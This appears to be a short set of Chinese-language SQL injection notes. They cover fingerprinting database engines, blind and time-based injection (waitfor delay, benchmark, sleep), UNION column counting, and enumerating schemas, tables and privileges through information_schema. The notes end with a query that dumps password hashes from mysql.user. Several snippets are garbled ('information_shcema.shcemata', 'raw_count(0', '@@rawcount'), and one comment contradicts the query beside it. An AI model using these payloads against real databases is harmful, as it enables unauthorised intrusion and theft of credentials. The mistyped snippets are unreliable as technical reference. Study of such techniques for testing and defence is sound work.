获取标志信息

mysql select version(),select @@version

mssql select @@version,@@servername,@@language,@@spid

postgre select version()

 

盲跟踪

从字符串推断数据库

mysql select 'so'   'me'

mssql select 'so'+'me'

oracle select 'so'||'me'

postgre select 'so'||'me'

从数字推断数据库

mysql raw_count(0

mssql @@rawcount

使用数据库“方言”推断数据库

mysql select 1 /*! + 1 */

 

使用union语句提取数据

order by确定列数

强制转换为字符串

mssql select cast('123' as varchar)

mysql select cast('123' as char)

 

使用条件语句

mssql if('a'='a') select 1 else select 2

mysql select if('a',1,2)

基于时间

mssql if(system_user = 'sa') waitfor delay '0:0:5' --

mysql select benchmark(1000000,sha1('hello')) 

如果mysql 版本在5.0.12以上

select sleep(5) 

 

case语句

case when sth then sth else sth end

 

枚举数据库模式

获取所有数据库 select schema_name from information_shcema.shcemata;

提取一个数据库中所有表 select table_schema,table_name from information_schema.tables where table_schema='db';

如果想获取所有表 只需省略where子句  select table_schema,table_name from information_schema.tables where table_schema !='mysql' and table_schema != 'information_schema';

select table_schema,table_name,column_name from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema';

获取用户权限

 select grantee,privilege_type,is_grantable from information_schema.user_privileges;

 

窃取哈希口令

select user,password from mysql.user